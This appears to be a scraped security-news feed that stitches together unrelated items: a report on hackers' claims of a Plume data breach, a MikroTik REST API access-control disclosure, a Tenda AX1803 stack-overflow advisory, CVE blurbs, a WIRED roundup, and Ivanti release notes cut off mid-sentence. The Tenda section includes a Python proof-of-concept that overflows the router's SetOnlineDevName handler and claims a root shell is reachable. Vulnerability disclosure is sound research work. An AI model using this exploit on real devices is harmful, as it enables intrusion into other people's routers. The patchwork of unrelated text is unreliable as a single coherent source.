By Waqas
Plume has not confirmed the data breach but has acknowledged that the company is aware of the claims made by hackers.
This is a post from HackRead.com Read the original post: Hackers Claim Major Data Breach at Smart WiFi Provider Plume

An X (Twitter) account, operated by hackers using the handle @MonkeyInject, alleges that the breach was facilitated by a former employee of Plume.

The smart Wi-Fi service provider, Plume, has apparently fallen victim to a data breach. The perpetrators, claiming responsibility for the incident, made their announcement on the notorious Breach Forums.

This is the same forum where, in the past few days, we observed the data leak of a scraped LinkedIn user database comprising 35 million entries and two scraped databases from Chess.com.

The Palo Alto, California-based Plume is a SaaS (software-as-a-company) platform offering users AI security, smart Wi-Fi, and cloud management services, and has footprints in over 45 countries, covering 55 million homes and small businesses.

The attackers are currently claiming to have stolen over 20GB of the company’s Wi-Fi database with over 15 million lines of information. Plume, however, has not confirmed the news, stating that it is aware of the attackers’ claims and has launched an investigation to verify these claims.

What the hackers are claiming (Screenshot: Hackread.com)

At the same time, dissatisfied with Plume’s response, the hackers have released two CSV files, each containing purported data of the company’s customers and employees. As reported by Hackread.com, the first file includes email addresses, full names, countries, device details, and other information related to the alleged 26,000 customers of the company.

The second file comprises 3,086 email addresses and full names, which the hackers claim belong to Plume’s employees. A majority of the leaked email addresses are associated with the @plume.com and @plumewifi.com domains.

The alleged Plume data as seen by Hackread.com

Darren James – Senior Product Manager, Specops Software – An Outpost24 Company commented on the alleged breach adding, “Any data breach that involves the loss of personal information is always a huge concern, not just for the affected organisation, but specifically for people whose data has been stolen.”

“Although we don’t have many details on this particular breach right now, even the loss of a username or email address can open an attack vector on any site where you have also used those same details,” James emphasised.

“My advice for anyone affected by such breaches, it is imperative that they change their passwords across all platforms that use the same username as soon as possible, ideally using a password that hasn’t already been breached,” he said.

****Hackers on X (Twitter)****

The hackers have also created an X (Twitter) profile to disclose details of the attack and stolen data on their handle @MonkeyInject, which is an interesting step as hackers usually hide their identities and operate covertly. Addressing the X community, the hackers wrote that:

“We hope this message finds you well. We regret to inform you that there has been a security breach at @plume, affecting approximately 8.5 million users, all staff, application tokens, and off-site locations, particularly in Metro Manila.”

In subsequent tweets, they noted that the leak includes email addresses, first and last names, device details, IP addresses, user IDs, city, cards, carriers, and other data. The hacker provided a preview of the information on their Twitter page to legitimize their claims.

MonkeyInject also revealed that the breach was facilitated by a former employee of Plume, who left the company in 2023 but still possessed access rights, indicating Plume’s lackluster approach toward implementing robust security protocols.

The hacker on X (Screenshot: Hackread.com)

The hackers gave the company 48 hours to comply with their demands otherwise, they would disclose more data. They also encouraged Plume to improve its access control policies to prevent similar incidents.

“This lapse in access management is a critical flaw that requires immediate attention. To safeguard the integrity of the affected data and protect the privacy of our users, we kindly request @plume’s prompt compliance with our demands within the next 48 hours. Failure to do so may result in the disclosure and sharing of additional sensitive information,” the hackers tweeted.

****Stay Tuned for Updates!****

Nevertheless, Hackread.com is closely monitoring the situation, and this article will be updated accordingly, taking into account any responses from Plume and in the event that the hackers decide to leak the entire trove of data.

****_RELATED ARTICLES_****

1.  **IBM Notifies Janssen CarePath Customers of Data Breach**
2.  **Human Error: Casio ClassPad Data Breach Impacting 148 Countries**
3.  **Sony Data Breach via MOVEit Vulnerability Affects Thousands in US**

Hackers Claim Major Data Breach at Smart WiFi Provider Plume

MikroTik RouterOS v7.1 to 7.11 was discovered to contain incorrect access control mechanisms in place for the Rest API.

Recently, Mikrotik added a REST server as a new API for managing the router. It is a nice alternative to their proprietary API when automating RouterOS.

However, young software usually contains bugs. Sometimes, these bugs are security-related, and, together with not-so-safe defaults, they may create a vulnerability.

This vulnerability has been assigned the ID CVE-2023-41570.

**Background**

RouterOS (from Mikrotik) is a closed-source Linux-based operating system for network appliances, specifically switches, routers and firewalls. It is used in Mikrotik appliances (such as RouterBOARD), but it can be downloaded and installed on other devices and virtual machines.

The management interfaces of RouterOS include SSH, MAC-Telnet, Winbox (a proprietary Windows-only tool), Webfig (a web user interface), and a proprietary API (additionally, ISPs have also TR-069). Since version v7.1beta4, RouterOS also includes a REST server. The REST server is started as a sub-resource of Webfig at /rest. More information on the RouterOS REST API web page.

**Authentication**

RouterOS supports local and remote user authentication and authorization databases (via RADIUS). Users belong to _groups_, each with its own permissions set. The resulting permission set is additive – it is the sum of all permissions granted by groups.

By default, only the local database is used, and three groups are present: full, with unlimited access to the router; write, with almost complete access except for file transfer (to/from the router itself) and user policies, and read, with read-only access (plus reboot privileges). Also, by default, rest-api is a specific permission granted to all groups.

Users may be restricted to logging in only from specific IP addresses or networks.

**The vulnerability**

REST APIs are protected by HTTP Basic authentication. You should provide a valid username and password pair. The username must have the rest-api (which, by default, is granted to all groups).

The vulnerability lies in the fact that, while other interfaces (SSH, Webfig, etc.) check whether the user is authorized to log in from that specific IP address, this is not the case for the REST server. **Users can access the REST server from any IP address**, even if they are not authorized in the users’ database.

To exploit this vulnerability:

*   the attacker must have a username and password pair that has rest-api permission (but no permission to log in from the attacker IP address);
*   the firewall should allow access to the web user interface from the IP address of the attacker;
*   Webfig (the web UI) must be enabled: the REST server is part of Webfig.

Note that, by default, all groups have the rest-api permission (any user is allowed to use REST APIs), and Webfig is enabled. There is no way to disable the REST server, as it is integrated into Webfig. This is unexpected; usually, services like SSH or proprietary APIs are under the “IP” -> “Services” menu with their independent entry. At the very least, there should be a flag in the Webfig service www to enable the REST server selectively (defaulting off).

So, I think the majority of those who left Webfig active don’t realize that they are exposing the REST endpoint too, and that every user can access it, regardless of the IP filter configured in the user database.

To exacerbate the problem, the read group has some dangerous permissions: sniff (to intercept traffic), reboot, and sensitive (read sensitive information, such as Wi-Fi passwords or IPSec pre-shared keys). I certainly do not expect a “read” user to reboot the router.

**Mikrotik advisory and solution**

Mikrotik released RouterOS version 7.12 with the fix (the changelog contains only a generic reference to “www - fixed allowed address setting for REST API users”).

**Timeline**

I followed the responsible disclosure process described in the “Responsible disclosure of discovered vulnerabilities” page. I reported the vulnerability at 2023-08-19 09:46:00 UTC and received the ACK at 2023-08-24 07:43:00 UTC. The fix was released in version 7.12 at 2023-11-09 09:45:00 UTC (time point from RouterOS changelog).

CVE-2023-41570: CVE-2023-41570: Access Control vulnerability in MikroTik REST API

Buffer Overflow vulnerability in Tenda AX1803 v1.0.0.1_2994 and earlier allows attackers to run arbitrary code via /goform/SetOnlineDevName.

**stack buffer overflow in tdhttpd in Tenda AX1803 1.0.0.1\_2994 and earlier allows remote authenticated users to remote code excution via SetOnlineDevName request****Overview**

**type**: Buffer Overflow vulnerability

**Manufacturer** : Tenda( (https://www.tenda.com.cn/)

**Product**: WiFi router ax1803

**Firmware download address** ： https://www.tenda.com.cn/download/detail-3421.html

**Product Information**:Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network!

Overview of the latest version router simulation of Tenda AX1803 v1.0.0.1\_2994  

**Vulnerablity details**

Download the firmware and decompress it, use Binwalk -e to extract filesystem  

The vulnerability lies in rootfs\_In /goform/SetOnlineDevName function of /bin/tdhttpd in ubif file system. attackers can access http://routerip/goform/SetOnlineDevName , and setting a very long DevName parameter to trigger stack buffer overlow, the stack buffer overflow can be caused to achieve the effect of router remote code excution and can obtain a stable root shell through a carefully constructed payload

Request can be found in this place:  

As we can see devName section in POST request.  

formSetDeviceName function (/bin/tdhttpd) call a function to bond device name with mac information, this function is vulnerable to buffer overflow.  
  
In the "set_name_with_mac" function, devName is copied into v9 array through sprintf function with format arg "%s;1", this means sprintf would copie all the content in devName and there is no length limitation for devName.  
The v9 array is defined in here. The length of array is 256 bytes, if the devName's length longer than v9 would cause buffer overflow

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    #!/usr/bin/env python3
    import requests,sys
    from pwn import *
    
    # replace ip address here
    url = "http://192.168.10.1/goform/SetOnlineDevName"
    payload = 'a' * 0x100
    
    payload = "mac=00:00:00:00:00:01&devName=%s&nodeName=mainNode"%payload
    content_length = len(payload)
    header = {
    "Host":"192.168.10.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"http://192.168.10.1",
    "Content-Length":"%d"%content_length,
    "Connection": "close",
    "Cookie": "password=bcf33de30ebf57e4d3785c08adec4b85cvztgb" # Note to replace the password field in the cookie
    }
    
    r = requests.post(url, headers=header, data=payload)
    
    

**result:**  
As you can see below, PC register is hijacked with payload. By constructing a payload, this can also get a stable root shell

CVE-2022-45781: Tenda AX1803 Buffer Overflow vulnerability . - XFALLEN

Netflix, Spotify, Twitter, PayPal, Slack. All down for millions of people. How a group of teen friends plunged into an underworld of cybercrime and broke the internet—then went to work for the FBI.

The Mirai Confessions: Three Young Hackers Who Built a Web-Killing Monster Finally Tell Their Story

Zephyr RTOS versions 3.5.0 and below suffer from a multitude of buffer overflow vulnerabilities.

Zephyr RTOS 3.x.0 Buffer Overflows

A vulnerability has been found in Intelbras RX 1500 1.1.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /WiFi.html of the component SSID Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-245065 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-6103

Improper Restriction of Excessive Authentication Attempts vulnerability in Samsung Smart TV UE40D7000 version T-GAPDEUC-1033.2 and before allows attackers to cause a denial of service via WPS attack tools.

CVE-2023-41270: SMOLD TV: Old & Smart

Plus: SolarWinds is charged with fraud, New Orleans police face recognition has flaws, and new details about Okta’s October data breach emerge.

As the Israel-Hamas war continues, with Israeli troops moving into the Gaza Strip and encircling Gaza City, one piece of technology is having an outsized impact on how we see and understand the war. Messaging app Telegram, which has a history of lax moderation, has been used by Hamas to share gruesome images and videos. The information has then spread to other social networks and millions more eyeballs. Sources tell WIRED that Telegram has been weaponized to spread horrific propaganda.

Microsoft has had a hard few months when it comes to the company’s own security, with Chinese-backed hackers stealing its cryptographic signing key, continued issues with Microsoft Exchange Servers, and its customers being impacted by failings. The company has now unveiled a plan to deal with the ever-growing range of threats. It’s the Secure Future Initiative, which plans, among multiple elements, to use AI-driven tools, improve its software development, and shorten its response time to vulnerabilities.

Also this week, we’ve looked at the privacy practices of Bluesky, Mastodon, and Meta’s Threads as all of the social media platforms jostle for space in a world where X, formerly known as Twitter, continues to implode. And things aren’t exactly great with this next generation of social media. With November arriving, we now have a detailed breakdown of the security vulnerabilities and patches issued last month. Microsoft, Google, Apple, and enterprise firms Cisco, VMWare, and Citrix all fixed major security flaws in October.

And there's more. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

The Flipper Zero is a versatile hacking tool designed for security researchers. The pocket-size pen-testing device can intercept and replay all kinds of wireless signals—including NFC, infrared, RFID, Bluetooth, and Wi-Fi. That means it's possible to read microchips and inspect signals being admitted from devices. Slightly more nefariously, we've found it can easily clone building-entry cards and read credit card details through people's clothes.

Over the last few weeks, the Flipper Zero, which costs around $170, has been gaining some traction for its ability to disrupt iPhones, particularly by sending them into denial of service (DoS) loops. As Ars Technica reported this week, the Flipper Zero, with some custom firmware, is able to send “a constant stream of messages” asking iPhones to connect via Bluetooth devices such as an Apple TV or AirPods. The barrage of notifications, which is sent by a nearby Flipper Zero, can overwhelm an iPhone and make it virtually unusable.

“My phone was getting these pop-ups every few minutes, and then my phone would reboot,” security researcher Jeroen van der Ham told Ars about a DoS attack he experienced while commuting in the Netherlands. He later replicated the attack in a lab environment, while other security researchers have also demonstrated the spamming ability in recent weeks. In van der Ham’s tests, the attack only worked on devices running iOS 17—and at the moment, the only way to prevent the attack is by turning off Bluetooth.

In 2019, hackers linked to Russia’s intelligence service broke into the network of software firm SolarWinds, planting a backdoor and ultimately finding their way into thousands of systems. This week, the US Securities and Exchange Commission charged Tim Brown, the CISO of SolarWinds, and the company with fraud and “internal control failures.” The SEC alleges that Brown and the company overstated SolarWinds’ cybersecurity practices while “understating or failing to disclose known risks.” The SEC claims that SolarWinds knew of “specific deficiencies” in the company’s security practices and made public claims that weren’t reflected in its own internal assessments.

“Rather than address these vulnerabilities, SolarWinds and Brown engaged in a campaign to paint a false picture of the company’s cyber controls environment, thereby depriving investors of accurate material information,” Gurbir S. Grewal, director of the SEC’s Division of Enforcement said in a statement. In response, Sudhakar Ramakrishna, the CEO of SolarWinds, said in a blog post that the allegations are part of a “misguided and improper enforcement action.”

For years, researchers have shown that face recognition systems, trained on millions of pictures of people, can misidentify women and people of color at disproportionate rates. The systems have led to wrongful arrests. A new investigation from Politico, focusing on a year’s worth of face recognition requests made by police in New Orleans, has found that the technology was almost exclusively used to try to identify Black people. The system also “failed to identify suspects a majority of the time,” the report says. Analysis of 15 requests for the use of face recognition technology found that only one of them was for a white suspect, and in nine cases the technology failed to find a match. Three of the six matches were also incorrect. “The data has pretty much proven that \[anti-face-recognition\] advocates were mostly correct,” one city councilor said.

Identity management company Okta has revealed more details about an intrusion into its systems, which it first disclosed on October 20. The company said the attackers, who had accessed its customer support system, accessed files belonging to 134 customers. (In these instances, customers are individual companies that subscribe to Okta’s services). “Some of these files were HAR files that contained session tokens which could in turn be used for session hijacking attacks,” the company disclosed in a blog post. These session tokens were used to “hijack” the Okta sessions of five separate companies. 1Password, BeyondTrust, and Cloudflare have all previously disclosed they detected suspicious activity, but it is not clear who the two remaining companies are.

This Cheap Hacking Device Can Crash Your iPhone With Pop-Ups

Ivanti Avalanche Incorrect Default Permissions allows Local Privilege Escalation Vulnerability

Release Information: Product: AvalanchePremise\_6.4.1.236 Description: Avalanche Premise 6.4.1.236 for Windows Version: v6.4.1.236 Notes: Avalanche 6.4.1.236 Release What's New in This Version -------------------------- Security hardening fixes to for the following reported issues: CVE-2022-43554 ZDI-CAN-19502 CVE-2022-43555 ZDI-CAN-19503 CVE-2023-41725 ZDI-CAN-21006 CVE-2023-32567 ZDI-CAN-21030 CVE-2023-41726 ZDI-CAN-21231 Reported by Trend Micro's Zero Day Initiative \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.4.1 Description: Avalanche Premise 6.4.1 for Windows Version: v6.4.1.207 Notes: Avalanche 6.4.1 Release What's New in This Version -------------------------- Security hardening fixes to for the following reported issues: CVE-2023-32560 TRA-470 Reported by a researcher at Tenable CVE-2023-32561 ZDI-CAN-20904 CVE-2023-32562 ZDI-CAN-20991 CVE-2023-32563 ZDI-CAN-21081 CVE-2023-32564 ZDI-CAN-21002 CVE-2023-32565 ZDI-CAN-21004 CVE-2023-32566 ZDI-CAN-21005 Reported by Trend Micro's Zero Day Initiative \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.4.0 Description: Avalanche Premise 6.4.0 for Windows Version: v6.4.0.186 Notes: Avalanche 6.4.0 Release What's New in This Version -------------------------- New features and enhancements: -Added scheduled reboot functionality -Added reboot functionality to WindowsCE device details page for supported devices/enabler -Added scheduled and manual reboots to Audit Log -Android Client Admin password moved to Android Restriction Payload from SDS Profile -Update Play Store search results UI in AE software payload -Update Play Store search results UI in AE restrictions payload -Add major os version device property to Smartdevices (SDS Controlled) OsVer 9.1.2 => OsVerMajor 009 OsVer 11.3 => OsVerMajor 011 OsVer 13 => OsVerMajor 013 OsVer funkyformat => OsVerMajor 000 OsVer missing => OsVerMajor 000 -The default CFS/LFS port is changed to 9019 in the installer on a clean install to avoid possible conflict with neurons/cloud agent -Scan to Config Profile UI updated to modern design Deprecated features: -5.3 Migration support removed. To upgrade from 5.3, you first need to upgrade to 6.2 or 6.3 , then updgrade to 6.4.0 -GCM settings retired: Remove GCM configuration in SDS profile Remove GCM as option in Enrollment rules if a pre-existing enrollment rule from 6.3 or previous had GCM set as the notification type, it will get changed to ANS in 6.4 Security hardening: -InfoRail Router encryption enforcement -InfoRail Access control API key creation page in support and licensing page -InfoRail API key field added to remote dserver installers -InfoRail options screen added to Installer (clear existing keys, legacy access, legacy ACE access) -User password strength on user password creation/edit -Double password fields (enter/confirm) have been changed to a single password field with a toggle to view password on creation or edit -Passwords are no longer viewable after changes have been saved \*\*Password fields in legacy WIndowsCE profiles have not been changed Fixes: Defect: Clicking on smart device location history logout and exception error Defect: dserver Profiles not displayed in deployment dialog Defect: Avalanche inventory search bar fails to retrieve devices by serial number Defect: SDS not observing the check in time interval, always using 24hrs Fix to address ZDI-CAN-17729 Fix to address ZDI-CAN-17750 Fix to address ZDI-CAN-17769 Fix to address ZDI-CAN-17812 Fix to address ZDI-CAN-19513 \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Product: AvalanchePremise\_6.3.4 Description: Avalanche Premise 6.3.4 for Windows Version: v6.3.4.153 Notes: Avalanche 6.3.4 Release What's New in This Version: Support for Battery Campaigns in Neurons Support for Device Actions in Neurons User Management: Neurons Access Token has been added to allow device commands to be sent from Neurons. Audit Log: Device commands sent from Neurons will be captured and filterable in the audit log. Fixes: Fix to address CVE-2021-44228 Fix to address CVE-2022-22965 Fix to address ZDI-CAN-15301 Fix to address ZDI-CAN-15328 Fix to address ZDI-CAN-15329 Fix to address ZDI-CAN-15330 Fix to address ZDI-CAN-15332 Fix to address ZDI-CAN-15333 Fix to address ZDI-CAN-15449 Fix to address ZDI-CAN-15493 Fix to address ZDI-CAN-15528 Fix to address ZDI-CAN-15919 Fix to address ZDI-CAN-15966 Fix to address ZDI-CAN-15967 \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.3 Description: Avalanche Premise 6.3.3 for Windows Version: v6.3.3.101 Notes: Avalanche 6.3.3 Release What's New in This Version: User Management: Neurons Access Token has been added to allow device commands to be sent from Neurons. Audit Log: Device commands sent from Neurons will be captured and filterable in the audit log. Android Enterprise Restrictions Payload: Allow Developer Options to be enabled on the Android Enterprise devices in Fully Managed mode. Configuring Windows (AIDC) Software Packages: Single use password is now issued and required for launching configuration utilities with software packages. Device Details: Device actions are now enabled or disabled based on the reporting of the enabler capabilities property. Data Repository Service: The DRS has been removed. File and OS Update payloads that used DRS will need to be updated to use the Central FileStore. Component Updates: Updated to Java 15 Updated to Tomcat 9.0.56 Fixes: Fix to address Remote Control service startup error when port 80 is blocked. Fix to address CVE-2021-30497 Fix to address ZDI-CAN-14123 Fix to address ZDI-CAN-14187 Fix to address ZDI-CAN-14188 Fix to address ZDI-CAN-15130 Fix to address ZDI-CAN-15137 Fix to address ZDI-CAN-15168 Fix to address ZDI-CAN-15169 Fix to address ZDI-CAN-15200 Fix to address ZDI-CAN-15217 Fix to address ZDI-CAN-15251 \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.2 Description: Avalanche Premise 6.3.2 for Windows Version: v6.3.2.3490 Notes: Avalanche 6.3.2 Release What's New in This Version: Printer management. Discover printers in the warehouse and bring them under management with a streamlined, remote provisioning process. Once your printers are managed by Avalanche, push files and settings to them, receive real-time alerts from them, and view their status remotely. Velocity configuration manifests. Create Velocity manifests to distribute Velocity configuration files from the Central File Store to your Android Enterprise devices. NFC provisioning for Android Enterprise. Use NFC provisioning to send Wi-Fi and enrollment information from an enrolled fully managed Android Enterprise device to new devices. QR code provisioning for Android Enterprise. Use QR code provisioning to send Wi-Fi and enrollment information from an enrolled fully managed Android Enterprise device to new devices. Android Enterprise enabler customization. Use an Android Enterprise enabler customization payload to configure the appearance of the enabler. Credentials certificate payload for Android. Use credentials certificate payloads with Wi-Fi payloads to verify the user or server identity when connecting to enterprise networks with Android and Android Enterprise devices. Temporarily disable lock task mode. To ease troubleshooting, temporarily disable lock task mode on a device from the console or the enabler. Android Enterprise provisioning profile. Use Android Enterprise provisioning profiles to create provisioning QR codes. Scan a provisioning QR code to enroll new fully managed devices with a reduced amount of device interaction. Reboot Android devices from the Avalanche Console. Launch apps on install or reboot. When creating an Android Enterprise software payload, you can select to launch the app on install or reboot. This option is important for installing remote control software. Fixes: Fix: Removed drag and drop in the folder tree. Drag and drop will continue to function when applying Smart Device and Printer profiles. Fix: Custom property changes to an individual device in the device details will not update all devices that share the same custom property. \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.1 Description: Avalanche Premise 6.3.1 for Windows Version: v6.3.1.1507 Notes: Avalanche 6.3.1 Release New Features and Improvements: Android Enterprise Support \*Support for Fully Managed and Dedicated Device (Kiosk) modes \*File Payload \*Restriction Payload (Fully Managed and Dedicated Device modes) \*Disable factory reset from settings \*Remove factory reset protection data \*System Update Policy Payload (Fully Managed and Dedicated Device modes) \*Wi-Fi Payload \*Scan to enroll support using the device camera \*Factory reset wipe command can remove factory reset protection data and wipe the SD card. \*Log file retrieval from device \*New Android Enterprise Enabler https://play.google.com/store/apps/details?id=com.ivanti.enterprise UI performance and user experience \*Load time improvements for Inventory, Profiles, and Rugged Device Details pages \*Inventory page has been split to three tabs: Device Inventory, Server Inventory, and Mobile Device Groups \*Smart Device Payloads have been moved to their own tab \*All Smart Device Payloads have been redesigned from a dialog based UI to a modern page design \*Smart Device Profile has been redesigned from a dialog based UI to a modern page design Velocity config support added for both Android and Android Enterprise management Create scan to enroll QR codes directly from Enrollment Rules UserVoice for Avalanche link UTC data model for custom columns to allow timestamp to be displayed as date and time. Fixes: Fix: Custom properties can now be saved in network and scan to configure profiles. Fix: Scan to configure, custom properties, and registry keys can now be edited after creation. Fix: Certificate Manager improvements \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.0 Description: Avalanche Premise 6.3.0 for Windows Version: v6.3.0.555 Notes: Avalanche 6.3.0 Release New Features and Improvements: Android Enterprise Work Profile Support \*Create new or enroll an existing Google Play Android Enterprise account \*Support for multiple enterprise accounts \*Enrollment Rules reference Google Play Android Enterprise accounts \*Passcode settings support for both Device and Work Profile \*Support for Google Enterprise Play Store apps, including configuration \*Runtime Permissions settings for Apps (Account wide for Google Enterprise or granular per app settings) \*Lock, Unenroll, Delete Work Profile \*New Android Enterprise Enabler https://play.google.com/store/apps/details?id=com.ivanti.enterprise FCM Notification Service support Panasonic OS Updates APN Payload for Android License upgrade from 6.2 to 6.3 (requires a restart of the eserver) Subscription License support HTTP/HTTPS Webserver configuration added to install Prerequisite Software settings for Manifest URL Software Payloads Outgoing IP address of router is reported as IP address setting added to Smart Device Profile Removed: Compliance Payload (Compliance status is now based on Android Enterprise Passcode Compliance) Fixes: Fix: Improved CFS logging Fix: Certificate Manager settings on reboot Fix: CFS access token expiration extended Fix: Android App Name handling with special characters Fix: CFS access token renewal Fix: Reduction in SDS device sync time with selection criteria Fix: Accessing device details from search no longer causes an error Fix: AIDC software profile now shows correct package type \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.2.2 Description: Avalanche Premise 6.2.2 for Windows Version: v6.2.2.197 Notes: Avalanche 6.2.2 Release New Features and Improvements: License upgrade option added to the web console (6.2.2 Only) Removed: Removed support for Java 7, Java 8 is now required Fixes: Security Fixes for CVE-2018-8901 and CVE-2018-8902 Security Fixes for Remote Control Web UI including JQuery updates Fixes to Central File Store configuration page \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.2.0 Description: Avalanche Premise 6.2.0 for Windows Version: v6.2.0.602 Notes: Avalanche 6.2.0 Release Key New/Changed features Overview: Enrollment Enrollment rules now determine whether the enabler will use ANS or GCM as the notification service on android. A new type of enrollment rule has been created called a reference Enrollment Rule (Global Enrollment Rule) has been added that allows rules to be added at regions and deployed to multiple SDservers. You may add a folder that will be created and deployed at the root of all SDservers below the rules region. Broadcast to enroll When a enroll.prf file has been placed on the device with ‘broadcast’ as the server address, it will now perform a UDP broadcast to find a listening SDServer on the same subnet. Multiple Smart Device Servers The SDS node has been altered to have a local Inforail, SDServer, ANServer and File Store. In order to allow this, a SDServer profile has been created. SDS Profile The settings for the central SDS have been moved from the system settings page into a new Smart Device Server Profile. These include: APNS Cert, Google GCM Info, 